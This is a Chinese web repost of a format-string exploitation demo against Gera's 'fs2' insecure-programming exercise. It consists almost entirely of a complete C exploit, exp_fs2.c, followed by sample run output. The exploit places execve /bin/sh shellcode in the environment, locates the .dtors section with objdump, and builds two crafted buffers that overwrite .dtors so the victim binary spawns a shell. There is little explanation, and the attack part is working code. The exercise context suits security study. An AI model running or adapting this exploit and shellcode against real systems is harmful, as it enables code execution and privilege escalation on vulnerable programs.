非安全编程演示之格式化字符串
2006-04-02 20:26:48 来源:WEB开发网
/*
** exp_fs2.c
** Coded by Core Security - info@core-sec.com
*/
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#define OBJDUMP "/usr/bin/objdump"
#define VICTIM "/home/user/gera/fs2"
#define GREP "/bin/grep"
/* 24 bytes shellcode */
char shellcode[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
int main(void) {
char *env[3] = {shellcode, NULL};
unsigned int first_half, second_half;
char evil_buffer_1[65500], evil_buffer_2[65500], temp_buffer[64];
char *p;
int dtors;
int ret = 0xbffffffa - strlen(shellcode) -
strlen("/home/user/gera/fs2");
FILE *f;
printf("Shellcode address: 0x%x\n", ret);
/* Splitting shellcode address in two */
first_half = (ret & 0xffff0000) >> 16;
printf("\nShellcode address - first half : 0x%x, %u\n", first_half,
first_half);
second_half = ret & 0x0000ffff;
printf("Shellcode address - second half: 0x%x, %u\n", second_half,
second_half);
sprintf(temp_buffer, "%s -t %s | %s dtors", OBJDUMP, VICTIM, GREP);
f = popen(temp_buffer, "r");
if( fscanf(f, "%x", &dtors) != 1) {
pclose(f);
printf("Error: Cannot find .dtors address!\n");
exit(1);
}
dtors += 4;
printf(".dtors address is: 0x%x\n\n", dtors);
/* First buffer writes first half of shellcode address*/
p = evil_buffer_1;
*((void **)p) = (void *) (dtors + 2);
p += 4;
/* 4 for .dtors addres and 2 for %c%c */
memset(p, 'A', (first_half - 4 - 2));
p += (first_half - 4 - 2);
*p = '\0';
/* Second buffer writes second half of shellcode address*/
p = evil_buffer_2;
*((void **)p) = (void *) (dtors);
p += 4;
/* 4 for .dtors addres and 2 for %c%c */
memset(p, 'B', (second_half - 4 - 2));
p += (second_half - 4 - 2);
*p = '\0';
execle("/home/user/gera/fs2", "fs2", evil_buffer_1, evil_buffer_2,
NULL, env);
}
运行如下:
user@CoreLabs:~/gera$ gcc fs2.c -o fs2
user@CoreLabs:~/gera$ gcc exp_fs2.c -o exp_fs2
user@CoreLabs:~/gera$ ./exp_fs2
Shellcode address: 0xbfffffcd
Shellcode address - first half : 0xbfff, 49151
Shellcode address - second half: 0xffcd, 65485
.dtors address is: 0x8049590
中查找“非安全编程演示之格式化字符串”更多相关内容
中查找“非安全编程演示之格式化字符串”更多相关内容更多精彩
赞助商链接
